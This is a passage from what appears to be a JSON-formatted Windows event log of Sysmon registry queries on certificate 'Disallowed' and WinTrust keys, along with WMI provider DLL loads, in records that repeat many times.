"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 
131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - 
"pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - 
"registry_value": "Disallowed", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "perfts.dll", - "image_path": "C:\\Windows\\System32\\perfts.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - 
"process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "usbperf.dll", - "image_path": "C:\\Windows\\System32\\usbperf.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480730000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482920000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "WmiApRpl.dll", - "image_path": "C:\\Windows\\System32\\wbem\\WmiApRpl.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480730000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482920000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482920000, - "unique_pid": 